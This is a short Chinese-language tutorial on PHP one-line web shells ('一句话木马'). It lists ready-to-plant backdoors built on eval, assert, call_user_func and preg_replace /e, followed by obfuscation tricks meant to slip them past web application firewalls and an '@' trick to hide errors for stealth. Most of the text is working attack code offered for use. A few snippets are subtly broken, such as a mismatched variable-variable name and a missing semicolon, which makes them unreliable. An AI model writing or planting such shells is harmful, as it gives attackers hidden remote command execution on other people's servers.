一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。
为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了发送的命令。
通过GET 、POST 、COOKIE这三种方式向一个网站提交数据
一句话木马用$_GET[' ']、$_POST[' ']、$_COOKIE[' '] 接收传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令
一句话木马大多都是只有两个部分,一个是可以执行代码的函数部分,一个是接收数据的部分
如:
<?php eval(@$_POST['a']); ?>
<?php assert(@$_POST['a']); ?>
<?php @call_user_func(assert,$_POST['a']); ?>
<?php @preg_replace("/abcde/e", $_POST['a'], "abcdefg"); ?>
<?php $test='<?php $a=$_POST["cmd"];assert($a); ?>'; file_put_contents("Trojan.php", $test); ?>
想要绕过waf,PHP小技巧
变量
<?php $a = "eval"; $a(@$_POST['a']); ?>
可变变量
<?php $bb="eval"; $a="bb"; $$aa($_POST['a']); ?>
str_replace
<?php $a=str_replace("Waldo", "", "eWaldoval"); $a(@$_POST['a']); ?>
base64_decode
<?php $a=base64_decode("ZXZhbA==") $a($_POST['a']); ?>
字符串连接
<?php $a="e"."v"; $b="a"."l"; $c=$a.$b; $c($_POST['a']); ?>
parse_str
<?php $str="a=eval"; parse_str($str); $a($_POST['a']); ?>
这些技巧每一种单独使用都不能绕过waf,但是与 第三大点提到的函数混合起来使用,就可以顺利的欺骗waf。tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。
<?php function fun() {return $_POST['a'];} @preg_replace("/test/e",fun(),"test test test"); ?>